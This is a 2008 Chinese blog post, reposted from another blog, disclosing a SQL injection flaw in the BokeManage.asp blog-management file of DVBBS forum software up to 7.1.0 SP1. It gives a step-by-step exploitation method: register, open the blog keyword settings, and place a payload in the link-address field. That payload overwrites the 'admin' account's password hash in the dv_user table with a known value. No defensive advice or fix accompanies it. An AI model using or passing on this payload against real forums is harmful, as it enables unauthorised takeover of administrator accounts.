数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

DVBBS 7.1.0 SP1博客远程注入漏洞
樱木花盗 发表于 2008-2-13 2:10:38
漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填


再编辑关健字


上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--

阅读全文 | 回复(2) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.